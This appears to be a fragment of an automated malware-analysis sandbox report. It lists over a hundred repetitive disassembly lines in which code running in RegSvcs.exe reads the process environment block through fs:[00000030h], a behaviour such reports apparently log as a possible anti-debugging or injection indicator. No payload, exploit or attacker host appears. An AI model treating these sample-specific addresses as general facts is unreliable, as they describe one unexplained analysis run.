Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134690 mov eax, dword ptr fs:[00000030h] 7_2_01134690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C68B mov eax, dword ptr fs:[00000030h] 7_2_0116C68B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011666B0 mov eax, dword ptr fs:[00000030h] 7_2_011666B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C6A6 mov eax, dword ptr fs:[00000030h] 7_2_0116C6A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A6C7 mov ebx, dword ptr fs:[00000030h] 7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A6C7 mov eax, dword ptr fs:[00000030h] 7_2_0116A6C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h] 7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h] 7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h] 7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE6F2 mov eax, dword ptr fs:[00000030h] 7_2_011AE6F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h] 7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B06F1 mov eax, dword ptr fs:[00000030h] 7_2_011B06F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h] 7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h] 7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h] 7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011426EB mov eax, dword ptr fs:[00000030h] 7_2_011426EB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BC912 mov eax, dword ptr fs:[00000030h] 7_2_011BC912
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h] 7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128918 mov eax, dword ptr fs:[00000030h] 7_2_01128918
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h] 7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AE908 mov eax, dword ptr fs:[00000030h] 7_2_011AE908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B892A mov eax, dword ptr fs:[00000030h] 7_2_011B892A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A950 mov eax, dword ptr fs:[00000030h] 7_2_0116A950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B0946 mov eax, dword ptr fs:[00000030h] 7_2_011B0946
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BC97C mov eax, dword ptr fs:[00000030h] 7_2_011BC97C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h] 7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h] 7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01156962 mov eax, dword ptr fs:[00000030h] 7_2_01156962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h] 7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0117096E mov edx, dword ptr fs:[00000030h] 7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0117096E mov eax, dword ptr fs:[00000030h] 7_2_0117096E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B89B3 mov esi, dword ptr fs:[00000030h] 7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h] 7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B89B3 mov eax, dword ptr fs:[00000030h] 7_2_011B89B3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h] 7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011309AD mov eax, dword ptr fs:[00000030h] 7_2_011309AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113A9D0 mov eax, dword ptr fs:[00000030h] 7_2_0113A9D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011649D0 mov eax, dword ptr fs:[00000030h] 7_2_011649D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h] 7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011629F9 mov eax, dword ptr fs:[00000030h] 7_2_011629F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BE9E0 mov eax, dword ptr fs:[00000030h] 7_2_011BE9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BC810 mov eax, dword ptr fs:[00000030h] 7_2_011BC810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov ecx, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01152835 mov eax, dword ptr fs:[00000030h] 7_2_01152835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116A830 mov eax, dword ptr fs:[00000030h] 7_2_0116A830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01160854 mov eax, dword ptr fs:[00000030h] 7_2_01160854
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h] 7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01134859 mov eax, dword ptr fs:[00000030h] 7_2_01134859
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h] 7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BE872 mov eax, dword ptr fs:[00000030h] 7_2_011BE872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BC89D mov eax, dword ptr fs:[00000030h] 7_2_011BC89D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130887 mov eax, dword ptr fs:[00000030h] 7_2_01130887
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011428D0 mov ecx, dword ptr fs:[00000030h] 7_2_011428D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115E8C0 mov eax, dword ptr fs:[00000030h] 7_2_0115E8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011328F0 mov eax, dword ptr fs:[00000030h] 7_2_011328F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h] 7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116C8F9 mov eax, dword ptr fs:[00000030h] 7_2_0116C8F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011AEB1D mov eax, dword ptr fs:[00000030h] 7_2_011AEB1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h] 7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EB20 mov eax, dword ptr fs:[00000030h] 7_2_0115EB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128B50 mov eax, dword ptr fs:[00000030h] 7_2_01128B50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112CB7E mov eax, dword ptr fs:[00000030h] 7_2_0112CB7E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h] 7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h] 7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142B79 mov eax, dword ptr fs:[00000030h] 7_2_01142B79
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h] 7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140BBE mov eax, dword ptr fs:[00000030h] 7_2_01140BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h] 7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h] 7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130BCD mov eax, dword ptr fs:[00000030h] 7_2_01130BCD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h] 7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h] 7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138BF0 mov eax, dword ptr fs:[00000030h] 7_2_01138BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168BF0 mov ecx, dword ptr fs:[00000030h] 7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h] 7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168BF0 mov eax, dword ptr fs:[00000030h] 7_2_01168BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EBFC mov eax, dword ptr fs:[00000030h] 7_2_0115EBFC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BCBF0 mov eax, dword ptr fs:[00000030h] 7_2_011BCBF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01192BF6 mov eax, dword ptr fs:[00000030h] 7_2_01192BF6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011BCA11 mov eax, dword ptr fs:[00000030h] 7_2_011BCA11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h] 7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01128A00 mov eax, dword ptr fs:[00000030h] 7_2_01128A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h] 7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01154A35 mov eax, dword ptr fs:[00000030h] 7_2_01154A35
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CA38 mov eax, dword ptr fs:[00000030h] 7_2_0116CA38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CA24 mov eax, dword ptr fs:[00000030h] 7_2_0116CA24
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01136A50 mov eax, dword ptr fs:[00000030h] 7_2_01136A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01160A50 mov eax, dword ptr fs:[00000030h] 7_2_01160A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h] 7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01140A5B mov eax, dword ptr fs:[00000030h] 7_2_01140A5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h] 7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h] 7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01142A45 mov eax, dword ptr fs:[00000030h] 7_2_01142A45
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h] 7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011ACA72 mov eax, dword ptr fs:[00000030h] 7_2_011ACA72
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h] 7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h] 7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CA6F mov eax, dword ptr fs:[00000030h] 7_2_0116CA6F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01168A90 mov edx, dword ptr fs:[00000030h] 7_2_01168A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h] 7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0112EA80 mov eax, dword ptr fs:[00000030h] 7_2_0112EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0113EA80 mov eax, dword ptr fs:[00000030h] 7_2_0113EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h] 7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138AA0 mov eax, dword ptr fs:[00000030h] 7_2_01138AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01186AA4 mov eax, dword ptr fs:[00000030h] 7_2_01186AA4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130AD0 mov eax, dword ptr fs:[00000030h] 7_2_01130AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h] 7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164AD0 mov eax, dword ptr fs:[00000030h] 7_2_01164AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h] 7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h] 7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01186ACC mov eax, dword ptr fs:[00000030h] 7_2_01186ACC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h] 7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116AAEE mov eax, dword ptr fs:[00000030h] 7_2_0116AAEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h] 7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h] 7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01126D10 mov eax, dword ptr fs:[00000030h] 7_2_01126D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01164D1D mov eax, dword ptr fs:[00000030h] 7_2_01164D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h] 7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h] 7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0114AD00 mov eax, dword ptr fs:[00000030h] 7_2_0114AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B8D20 mov eax, dword ptr fs:[00000030h] 7_2_011B8D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h] 7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h] 7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01130D59 mov eax, dword ptr fs:[00000030h] 7_2_01130D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h] 7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h] 7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h] 7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h] 7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01138D59 mov eax, dword ptr fs:[00000030h] 7_2_01138D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CDB1 mov ecx, dword ptr fs:[00000030h] 7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h] 7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0116CDB1 mov eax, dword ptr fs:[00000030h] 7_2_0116CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h] 7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01158DBF mov eax, dword ptr fs:[00000030h] 7_2_01158DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01166DA0 mov eax, dword ptr fs:[00000030h] 7_2_01166DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h] 7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115EDD3 mov eax, dword ptr fs:[00000030h] 7_2_0115EDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h] 7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_011B4DD7 mov eax, dword ptr fs:[00000030h] 7_2_011B4DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115CDF0 mov eax, dword ptr fs:[00000030h] 7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_0115CDF0 mov ecx, dword ptr fs:[00000030h] 7_2_0115CDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 7_2_01150DE1 mov eax, dword ptr fs:[00000030h] 7_2_01150DE1
